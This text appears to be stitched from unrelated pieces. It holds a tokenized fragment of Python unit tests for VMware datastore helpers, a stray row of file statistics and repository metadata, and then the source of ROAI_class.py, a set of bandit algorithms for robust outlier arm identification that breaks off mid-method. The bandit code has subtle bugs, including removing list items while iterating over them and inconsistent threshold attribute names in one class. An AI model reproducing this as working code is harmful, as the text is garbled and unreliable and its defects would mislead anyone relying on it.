DECL|member|test_is_datastore_valid_matching_regex
dedent|''
name|'def'
name|'test_is_datastore_valid_matching_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"ds-1"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_connected_hosts_none
dedent|''
name|'def'
name|'test_get_connected_hosts_none'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'_call_method'"
op|')'
name|'as'
name|'_call_method'
op|':'
newline|'\n'
indent|' '
name|'hosts'
op|'='
name|'ds_util'
op|'.'
name|'get_connected_hosts'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake_datastore'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
op|']'
op|','
name|'hosts'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake_datastore'"
op|','
string|"'host'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_connected_hosts
dedent|''
dedent|''
name|'def'
name|'test_get_connected_hosts'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'host'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host'
op|'.'
name|'value'
op|'='
string|"'fake-host'"
newline|'\n'
name|'host_mount'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host_mount'
op|'.'
name|'key'
op|'='
name|'host'
newline|'\n'
name|'host_mounts'
op|'='
name|'mock'
op|'.'
name|'Mock'
op|'('
name|'spec'
op|'='
name|'object'
op|')'
newline|'\n'
name|'host_mounts'
op|'.'
name|'DatastoreHostMount'
op|'='
op|'['
name|'host_mount'
op|']'
newline|'\n'
nl|'\n'
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'return_value'
op|'='
name|'host_mounts'
op|')'
name|'as'
name|'_call_method'
op|':'
newline|'\n'
indent|' '
name|'hosts'
op|'='
name|'ds_util'
op|'.'
name|'get_connected_hosts'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake_datastore'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
op|'['
string|"'fake-host'"
op|']'
op|','
name|'hosts'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'get_object_property'"
op|','
nl|'\n'
string|"'fake_datastore'"
op|','
string|"'host'"
op|')'
newline|'\n'
dedent|''
dedent|''
dedent|''
endmarker|''
end_unit
| 12.69904 | 88 | 0.603357 | 6,632 | 44,980 | 3.97301 | 0.05187 | 0.16031 | 0.092603 | 0.053285 | 0.876959 | 0.833011 | 0.805458 | 0.753008 | 0.71164 | 0.679532 | 0 | 0.001985 | 0.104135 | 44,980 | 3,541 | 89 | 12.702626 | 0.651901 | 0 | 0 | 0.943519 | 0 | 0 | 0.378235 | 0.043931 | 0 | 0 | 0 | 0 | 0.016097 | 0 | null | null | 0.000565 | 0.002542 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
28a0d0e0140daaed4e0010baf05909b3e0163a59 | 45,892 | py | Python | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | 1 | 2021-10-01T17:43:42.000Z | 2021-10-01T17:43:42.000Z | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | null | null | null | ROAI_class.py | yinglunz/ROAI_ICML2020 | 827ca6f6279c93d8a35871c286a2b76a86afae7c | [
"MIT"
] | null | null | null | import numpy as np
import math
def get_reward(instance, arm, sigma, instance_type):
if instance_type == 'bernoulli':
if np.random.random() < instance[arm]:
return 1
else:
return 0
else:
return np.random.normal(instance[arm], sigma)
class RR:
def __init__(self, instance, mean, std, k, sigma, delta, tol):
self.instance = instance
self.n = len(instance)
n = self.n
self.mean = mean
self.std = std
self.k = k
# this k denotes the original one
self.threshold_true = self.mean + self.k * self.std
self.outlier_set_true = []
self.instance_type = 'bernoulli'
self.sigma = sigma
self.delta = delta
self.tol = tol
self.t = 0
self.active_set = []
self.wins = np.zeros(n)
self.pulls = np.zeros(n)
self.rewards = np.zeros(n)
# rewards here represents the empirical mean of each arm
self.ucbs = np.ones(n)
self.lcbs = np.zeros(n)
self.index_pull = 0
self.threshold_spec = 0
self.outlier_set_spec = []
self.outlier_set_spec_sub = []
self.outlier_set_spec_sup = []
self.threshold_at = 0
self.threshold_lcb = 0
self.threshold_ucb = 1
self.outlier_set_at = []
def compute_ci_hoeffding(self, arm):
log_term = math.log((np.pi**2 * (self.n+1) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return math.sqrt(log_term / (2 * self.pulls[arm]))
# note that they need a (n+1) term rather than a (n) term
def compute_ci_threshold(self):
log_term = math.log(((math.pi ** 2) * self.n * (self.t ** 2)) / (3 * self.delta))
sum_inverse = 0
for arm in range(self.n):
sum_inverse += 1 / self.pulls[arm]
harmonic_mean = self.n / sum_inverse
return math.sqrt((log_term * self.l_k) / (2 * harmonic_mean))
def initialization(self):
g_k = ((1 + (self.k * math.sqrt(self.n - 1))) ** 2) / self.n
self.l_k = (np.sqrt(g_k) + np.sqrt(self.k**2/(2* np.log((np.pi**2 * self.n**3)/(6*self.delta)))))**2
# compute true set of outliers
self.threshold_spec = np.mean(self.instance) + self.k * np.std(self.instance)
for arm in range(self.n):
if self.instance[arm] > self.threshold_spec - self.tol:
self.outlier_set_spec_sup.append(arm)
if self.instance[arm] > self.threshold_spec:
self.outlier_set_spec.append(arm)
if self.instance[arm] > self.threshold_spec + self.tol:
self.outlier_set_spec_sub.append(arm)
if self.instance[arm] > self.threshold_true:
self.outlier_set_true.append(arm)
# pull each arm once
for arm in range(self.n):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
beta_tilde = self.compute_ci_hoeffding(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
beta_tilde_threshold = self.compute_ci_threshold()
self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
self.threshold_ucb = self.threshold_at + beta_tilde_threshold
self.threshold_lcb = self.threshold_at - beta_tilde_threshold
self.outlier_set_at = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold_at:
self.outlier_set_at.append(arm)
if (self.rewards[arm] > self.threshold_at and self.lcbs[arm] < self.threshold_ucb) or \
(self.rewards[arm] <= self.threshold_at and self.ucbs[arm] > self.threshold_lcb):
self.active_set.append(arm)
def update(self):
arm = self.index_pull
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
beta_tilde = self.compute_ci_hoeffding(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
beta_tilde_threshold = self.compute_ci_threshold()
self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
self.threshold_ucb = self.threshold_at + beta_tilde_threshold
self.threshold_lcb = self.threshold_at - beta_tilde_threshold
self.outlier_set_at = []
for i in range(self.n):
if self.rewards[i] > self.threshold_at:
self.outlier_set_at.append(i)
for arm in self.active_set:
if (self.rewards[arm] > self.threshold_at and self.threshold_ucb <= self.lcbs[arm]) or \
(self.rewards[arm] <= self.threshold_at and self.ucbs[arm] <= self.threshold_lcb):
self.active_set.remove(arm)
self.index_pull = (self.index_pull + 1) % self.n
def compute_error(self):
error_spec_tol = 1
error_spec = 1
if (set(self.outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
(set(self.outlier_set_spec_sub).issubset(set(self.outlier_set_at))):
error_spec_tol = 0
if self.outlier_set_at == self.outlier_set_spec:
error_spec = 0
error_general = 1
if self.outlier_set_at == self.outlier_set_true:
error_general = 0
return error_general, error_spec_tol, error_spec
class WRR:
def __init__(self, instance, mean, std, k, sigma, delta, tol):
self.instance = instance
n = len(instance)
self.n = n
self.mean = mean
self.std = std
self.k = k
self.threshold_true = self.mean + self.k * self.std
self.outlier_set_true = []
self.instance_type = 'bernoulli'
self.sigma = sigma
self.delta = delta
self.tol = tol
self.t = 0
self.active_set = []
self.l_k = 0
self.rho = 0
self.wins = np.zeros(n)
self.pulls = np.ones(n)
self.rewards = np.zeros(n)
self.ucbs = np.ones(n)
self.lcbs = np.zeros(n)
self.threshold_spec = 0
self.outlier_set_spec = []
self.outlier_set_spec_sub = []
self.outlier_set_spec_sup = []
# at = anytime
self.threshold_at = 0
self.threshold_lub = 0
self.threshold_ucb = 1
self.outlier_set_at = []
self.s_active_len = n
self.index_pull = 0
self.threshold_pulls = np.zeros(n)
# in certain iteration of WRR, pulls on a certain arm need to exceed the threshold pull before pulling other arms
def compute_ci_hoeffding(self, arm):
log_term = math.log((np.pi**2 * (self.n+1) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return math.sqrt(log_term / (2 * self.pulls[arm]))
# note that they need a (n+1) term rather than a (n) term
def compute_ci_threshold(self):
log_term = math.log(((math.pi ** 2) * self.n * (self.t ** 2)) / (3 * self.delta))
sum_inverse = 0
for arm in range(self.n):
sum_inverse += 1 / self.pulls[arm]
harmonic_mean = self.n / sum_inverse
return math.sqrt((log_term * self.l_k) / (2 * harmonic_mean))
def compute_rho(self):
rho = (((self.n - 1) ** 2) / self.l_k) ** (1 / 3)
return rho
def initialization(self):
g_k = ((1 + (self.k * math.sqrt(self.n - 1))) ** 2) / self.n
self.l_k = (np.sqrt(g_k) + np.sqrt(self.k**2/(2* np.log((np.pi**2 * self.n**3)/(6*self.delta)))))**2
self.rho = self.compute_rho()
self.threshold_spec = np.mean(self.instance) + self.k * np.std(self.instance)
for arm in range(self.n):
if self.instance[arm] > self.threshold_spec - self.tol:
self.outlier_set_spec_sup.append(arm)
if self.instance[arm] > self.threshold_spec:
self.outlier_set_spec.append(arm)
if self.instance[arm] > self.threshold_spec + self.tol:
self.outlier_set_spec_sub.append(arm)
if self.instance[arm] > self.threshold_true:
self.outlier_set_true.append(arm)
for arm in range(self.n):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
beta_tilde = self.compute_ci_hoeffding(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
beta_tilde_threshold = self.compute_ci_threshold()
self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
self.ucb_threshold = self.threshold_at + beta_tilde_threshold
self.lcb_threshold = self.threshold_at - beta_tilde_threshold
self.outlier_set_at = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold_at:
self.outlier_set_at.append(arm)
if (self.rewards[arm] > self.threshold_at and self.lcbs[arm] < self.ucb_threshold) or \
(self.rewards[arm] <= self.threshold_at and self.ucbs[arm] > self.ucb_threshold):
self.active_set.append(arm)
self.s_active_len = len(self.active_set)
def update_regular(self):
arm = self.index_pull
self.threshold_pulls[arm] += self.rho
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
beta_tilde = self.compute_ci_hoeffding(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
beta_tilde_threshold = self.compute_ci_threshold()
self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
self.threshold_ucb = self.threshold_at + beta_tilde_threshold
self.threshold_lcb = self.threshold_at - beta_tilde_threshold
self.outlier_set_at = []
for i in range(self.n):
if self.rewards[i] > self.threshold_at:
self.outlier_set_at.append(i)
for arm in self.active_set:
if (self.rewards[arm] > self.threshold_at and self.threshold_ucb <= self.lcbs[arm]) or \
(self.rewards[arm] <= self.threshold_at and self.ucbs[arm] <= self.threshold_lcb):
self.active_set.remove(arm)
self.s_active_len = len(self.active_set)
self.index_pull = (self.index_pull + 1) % self.n
def update_additional(self, arm):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
beta_tilde = self.compute_ci_hoeffding(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
beta_tilde_threshold = self.compute_ci_threshold()
self.threshold_at = np.mean(self.rewards) + self.k * np.std(self.rewards)
self.ucb_threshold = self.threshold_at + beta_tilde_threshold
self.lcb_threshold = self.threshold_at - beta_tilde_threshold
self.outlier_set_at = []
for i in range(self.n):
if self.rewards[i] > self.threshold_at:
self.outlier_set_at.append(i)
for arm in self.active_set:
if (self.rewards[arm] > self.threshold_at and self.threshold_ucb <= self.lcbs[arm]) or \
(self.rewards[arm] <= self.threshold_at and self.ucbs[arm] <= self.threshold_lcb):
self.active_set.remove(arm)
self.s_active_len = len(self.active_set)
def compute_error(self):
error_spec_tol = 1
error_spec = 1
if (set(self.outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
(set(self.outlier_set_spec_sub).issubset(set(self.outlier_set_at))):
error_spec_tol = 0
if self.outlier_set_at == self.outlier_set_spec:
error_spec = 0
error_general = 1
if self.outlier_set_at == self.outlier_set_true:
error_general = 0
return error_general, error_spec_tol, error_spec
def get_results(self):
empirical_outlier_set = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold:
empirical_outlier_set.append(arm)
return empirical_outlier_set, self.t, self.threshold
def output_outlier_set(self):
self.threshold = np.mean(self.rewards) + self.k * np.std(self.rewards)
empirical_outlier_set = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold:
empirical_outlier_set.append(arm)
return empirical_outlier_set
class RANDOM:
def __init__(self, instance, n_select, mean, std, k, instance_type, sigma, delta, tol):
self.n = len(instance)
n = self.n
self.instance = instance
self.n_select = n_select
self.mean = mean
self.std = std
self.k_original = k
self.threshold_true = self.mean + self.k_original * self.std
self.outlier_set_true = []
self.k = 1.4826 * self.k_original
# k_original denotes the original k
# while k denotes the adjusted one for MAD
self.instance_type = instance_type
self.sigma = sigma
self.delta = delta
self.tol = tol
self.t = 0
self.wins = np.zeros(n)
self.pulls = np.zeros(n)
self.rewards = np.zeros(n)
self.ucbs = np.ones(n)
self.lcbs = np.zeros(n)
self.sample_candidate = list(range(n))
# s: set; u: upper; m: median; l: lower
# MAD: median absolute deviation
self.index_select = []
self.cluster_boundary_spec = []
# cluster boundary store boundaries for the selected index
# everything below are primarily designed for the selected index
# we will use spec to denote method specific values
self.s_u_spec = []
self.s_m_spec = []
self.s_l_spec = []
self.median_spec = 0
# AD = absolute deviation
self.AD_spec = np.zeros(n)
self.s_MAD_spec = []
self.MAD_spec = 0
self.threshold_spec = 0
self.outlier_set_spec = []
self.outlier_set_spec_sub = []
self.outlier_set_spec_sup = []
# at = anytime
# anytime here refers to anytime decision of the set
self.s_u_at = []
self.s_m_at = []
self.s_l_at = []
self.median_at = 0
self.AD_at = np.zeros(n)
self.s_MAD_at = []
self.MAD_at = 0
self.threshold_at = 0
# s_median_ucb store arms contribute to the ucb of median
self.s_median_ucb = []
self.median_ucb = 1
self.s_median_lcb = []
self.median_lcb = 0
self.AD_ucbs = np.ones(n)
self.AD_lcbs = np.ones(n)
# s_MAD_ucb store arms contribute to the ucb of MAD
self.s_MAD_ucb = []
self.MAD_ucb = 1
self.s_MAD_lcb = []
self.MAD_lcb = 0
self.threshold_lcb = 0
self.threshold_ucb = 1
self.s_active = []
self.s_active_len = n
# store active arms
def compute_ci_hoeffding(self, arm):
beta = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return math.sqrt(beta / (2 * self.pulls[arm]))
def compute_ci_subgaussian(self, arm):
log_term = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return self.sigma * math.sqrt(2 * log_term / self.pulls[arm])
def update_internal(self):
[start, end] = self.cluster_boundary_spec
ranking_lcbs = np.argsort(self.lcbs[self.index_select])
self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
ranking_ucbs = np.argsort(self.ucbs[self.index_select])
self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
for i in self.index_select:
self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
# we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
# if self.ucbs[i] >= self.median_ucb:
# if self.median_ucb <= self.lcbs[i]:
# self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
# else:
# self.AD_lcbs[i] = 0
# else:
# if self.ucbs[i] <= self.median_lcb:
# self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
# else:
# self.AD_lcbs[i] = 0
if self.AD_ucbs[i] < self.AD_lcbs[i]:
print('something wrong when computing the absolute deviation')
ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
self.s_active = list(range(self.n))
for i in range(self.n):
if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
self.s_active.remove(i)
self.s_active_len = len(self.s_active)
def update(self):
arm = np.random.choice(self.sample_candidate)
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
if arm in self.index_select:
self.update_internal()
def initialization(self):
self.index_select = np.random.choice(self.n, self.n_select, replace=False)
n_select = self.n_select
if n_select % 2 == 1:
start = int((n_select - 1) / 2)
end = int((n_select + 1) / 2)
else:
start = int((n_select - 2) / 2)
end = int((n_select + 2) / 2)
self.cluster_boundary_spec = [start, end]
ranking = np.argsort(self.instance[self.index_select])
self.s_l_spec = self.index_select[ranking[:start]]
self.s_m_spec = self.index_select[ranking[start:end]]
self.s_u_spec = self.index_select[ranking[end:]]
self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
for i in range(self.n):
self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
ranking_AD = np.argsort(self.AD_spec[self.index_select])
self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
self.threshold_spec = self.median_spec + self.k * self.MAD_spec
for arm in range(self.n):
if self.instance[arm] > self.threshold_spec - self.tol:
self.outlier_set_spec_sup.append(arm)
if self.instance[arm] > self.threshold_spec:
self.outlier_set_spec.append(arm)
if self.instance[arm] > self.threshold_spec + self.tol:
self.outlier_set_spec_sub.append(arm)
if self.instance[arm] > self.threshold_true:
self.outlier_set_true.append(arm)
# pull each arm once
for arm in range(self.n):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
self.update_internal()
def output_outlier_set(self):
# output empirical outlier set
outlier_set_empirical = []
for arm in range(self.n):
if self.rewards[arm] > self.threshold_at:
outlier_set_empirical.append(arm)
return outlier_set_empirical
def compute_error(self):
outlier_set_at = self.output_outlier_set()
error_spec_tol = 1
error_spec = 1
if (set(outlier_set_at).issubset(set(self.outlier_set_spec_sup))) and \
(set(self.outlier_set_spec_sub).issubset(set(outlier_set_at))):
error_spec_tol = 0
if outlier_set_at == self.outlier_set_spec:
error_spec = 0
error_general = 1
if outlier_set_at == self.outlier_set_true:
error_general = 0
return error_general, error_spec_tol, error_spec
class ROAI:
def __init__(self, instance, n_select, mean, std, k, instance_type, sigma, delta, tol):
self.n = len(instance)
n = self.n
self.instance = instance
self.n_select = n_select
self.mean = mean
self.std = std
self.k_original = k
self.threshold_true = self.mean + self.k_original * self.std
self.outlier_set_true = []
self.k = 1.4826 * k
# k_original denotes the original k value
# while k is adjusted for MAD
self.instance_type = instance_type
self.sigma = sigma
self.delta = delta
self.tol = tol
self.t = 0
self.wins = np.zeros(n)
self.pulls = np.zeros(n)
self.rewards = np.zeros(n)
self.ucbs = np.ones(n)
self.lcbs = np.zeros(n)
# s: set; u: upper; m: median; l: lower; all in terms of median value
# MAD: median absolute deviation
self.index_select = []
self.cluster_boundary_spec = []
# cluster boundary store boundaries for the selected index
# everything below are primarily designed for the selected index
# we will use spec to denote the method-specific
self.s_u_spec = []
self.s_m_spec = []
self.s_l_spec = []
self.median_spec = 0
# AD = absolute deviation
self.AD_spec = np.zeros(n)
self.s_MAD_spec = []
self.MAD_spec = 0
self.threshold_spec = 0
self.outlier_set_spec = []
self.outlier_set_spec_sub = []
self.outlier_set_spec_sup = []
# calculated based on the specific way of selecting outlier threshold
# at = anytime
# anytime here refers to anytime decision of the set
self.s_u_at = []
self.s_m_at = []
self.s_l_at = []
self.median_at = 0
self.AD_at = np.zeros(n)
self.s_MAD_at = []
self.MAD_at = 0
self.threshold_at = 0
# sample_candidate is the set for arms to be sampled, which should be the union of three components
self.sample_candidate = []
self.sample_candidate_threshold = []
self.sample_candidate_arms = []
# median lcb = median(lcbs), same for median_ucb
self.s_median_lcb = []
self.median_lcb = 0
self.s_median_ucb = []
self.median_ucb = 1
# AD_ucbs = upper bound of absolute deviation, same for AD_lcbs
self.AD_ucbs = np.ones(n)
self.AD_lcbs = np.ones(n)
# s_MAD_ucb contains arms that contribute to the ucb of MAD
self.s_MAD_ucb = []
self.MAD_ucb = 1
self.s_MAD_lcb = []
self.MAD_lcb = 0
self.threshold_lcb = 0
self.threshold_ucb = 1
# below are for lucb algorithm
self.s_outlier_at = []
self.s_not_outlier_at = []
# upper/lower set of arms in terms of AD at anytime; same as self.s_MAD_at
self.s_uAD_at = []
self.s_lAD_at = []
self.s_active = []
# arms in active set are those haven't been determined
self.s_active_len = n
def compute_ci_hoeffding(self, arm):
log_term = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return math.sqrt(log_term / (2 * self.pulls[arm]))
def compute_ci_subgaussian(self, arm):
log_term = math.log((np.pi**2 * (self.n) * (self.pulls[arm] ** 2)) / (3 * self.delta))
return self.sigma * math.sqrt(2 * log_term / self.pulls[arm])
# update threshold and sample candidate
# _elimi = elimination-styled updating in how to select sample candidate
def update_internal_elimi(self):
[start, end] = self.cluster_boundary_spec
ranking_lcbs = np.argsort(self.lcbs[self.index_select])
self.s_median_lcb = self.index_select[ranking_lcbs[start: end]]
self.median_lcb = sum(self.lcbs[i] for i in self.s_median_lcb) / len(self.s_median_lcb)
ranking_ucbs = np.argsort(self.ucbs[self.index_select])
self.s_median_ucb = self.index_select[ranking_ucbs[start: end]]
self.median_ucb = sum(self.ucbs[i] for i in self.s_median_ucb) / len(self.s_median_ucb)
for i in self.index_select:
self.AD_ucbs[i] = max(self.ucbs[i] - self.median_lcb, self.median_ucb - self.lcbs[i])
self.AD_lcbs[i] = max(self.lcbs[i] - self.median_ucb, self.median_lcb - self.ucbs[i])
# we define AD_lcb in the way above to provide better estimations of \widehat{AD} at the beginning stage
# if self.ucbs[i] >= self.median_ucb:
# if self.median_ucb <= self.lcbs[i]:
# self.AD_lcbs[i] = self.lcbs[i] - self.median_ucb
# else:
# self.AD_lcbs[i] = 0
# else:
# if self.ucbs[i] <= self.median_lcb:
# self.AD_lcbs[i] = self.median_lcb - self.ucbs[i]
# else:
# self.AD_lcbs[i] = 0
if self.AD_ucbs[i] < self.AD_lcbs[i]:
print('something wrong when computing the absolute deviation')
ranking_AD_lcbs = np.argsort(self.AD_lcbs[self.index_select])
self.s_MAD_lcb = self.index_select[ranking_AD_lcbs[start: end]]
self.MAD_lcb = sum(self.AD_lcbs[i] for i in self.s_MAD_lcb) / len(self.s_MAD_lcb)
ranking_AD_ucbs = np.argsort(self.AD_ucbs[self.index_select])
self.s_MAD_ucb = self.index_select[ranking_AD_ucbs[start: end]]
self.MAD_ucb = sum(self.AD_ucbs[i] for i in self.s_MAD_ucb) / len(self.s_MAD_ucb)
self.threshold_lcb = self.median_lcb + self.k * self.MAD_lcb
self.threshold_ucb = self.median_ucb + self.k * self.MAD_ucb
self.threshold_at = (self.threshold_lcb + self.threshold_ucb)/2
# arms whose confidence interval intersects with the ci of threshold should be sample candidates
self.s_active = list(range(self.n))
for i in range(self.n):
if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
self.s_active.remove(i)
self.s_active_len = len(self.s_active)
self.sample_candidate = list(range(self.n))
for i in range(self.n):
if self.ucbs[i] < self.threshold_lcb or self.lcbs[i] > self.threshold_ucb:
self.sample_candidate.remove(i)
# things below are specified for the elimination style
for i in self.index_select:
if (self.ucbs[i] >= self.median_ucb and self.lcbs[i] <= self.median_ucb) \
or (self.ucbs[i] < self.median_ucb and self.ucbs[i] >= self.median_lcb):
self.sample_candidate.append(i)
if (self.AD_ucbs[i] >= self.MAD_ucb and self.AD_lcbs[i] <= self.MAD_ucb) \
or (self.AD_ucbs[i] < self.MAD_ucb and self.AD_ucbs[i] >= self.MAD_lcb):
self.sample_candidate.append(i)
self.sample_candidate = list(set(self.sample_candidate))
self.sample_candidate.sort()
def initialization_elimi(self):
self.index_select = np.random.choice(self.n, self.n_select, replace=False)
# compute true set of outliers
n = self.n_select
if n % 2 == 1:
start = int((n - 1) / 2)
end = int((n + 1) / 2)
else:
start = int((n - 2) / 2)
end = int((n + 2) / 2)
self.cluster_boundary_spec = [start, end]
ranking = np.argsort(self.instance[self.index_select])
self.s_l_spec = self.index_select[ranking[:start]]
self.s_m_spec = self.index_select[ranking[start:end]]
self.s_u_spec = self.index_select[ranking[end:]]
self.median_spec = sum(self.instance[i] for i in self.s_m_spec) / len(self.s_m_spec)
for i in range(self.n):
self.AD_spec[i] = abs(self.instance[i] - self.median_spec)
ranking_AD = np.argsort(self.AD_spec[self.index_select])
self.s_MAD_spec = self.index_select[ranking_AD[start:end]]
self.MAD_spec = sum(self.AD_spec[i] for i in self.s_MAD_spec) / len(self.s_MAD_spec)
self.threshold_spec = self.median_spec + self.k * self.MAD_spec
for arm in range(self.n):
if self.instance[arm] > self.threshold_spec - self.tol:
self.outlier_set_spec_sup.append(arm)
if self.instance[arm] > self.threshold_spec:
self.outlier_set_spec.append(arm)
if self.instance[arm] > self.threshold_spec + self.tol:
self.outlier_set_spec_sub.append(arm)
if self.instance[arm] > self.threshold_true:
self.outlier_set_true.append(arm)
# pull each arm once
for arm in range(self.n):
rwd = get_reward(self.instance, arm, self.sigma, self.instance_type)
self.t += 1
self.wins[arm] += rwd
self.pulls[arm] += 1
self.rewards[arm] = self.wins[arm] / self.pulls[arm]
if self.instance_type == 'bernoulli':
beta_tilde = self.compute_ci_hoeffding(arm)
else:
beta_tilde = self.compute_ci_subgaussian(arm)
self.ucbs[arm] = self.rewards[arm] + beta_tilde
self.lcbs[arm] = self.rewards[arm] - beta_tilde
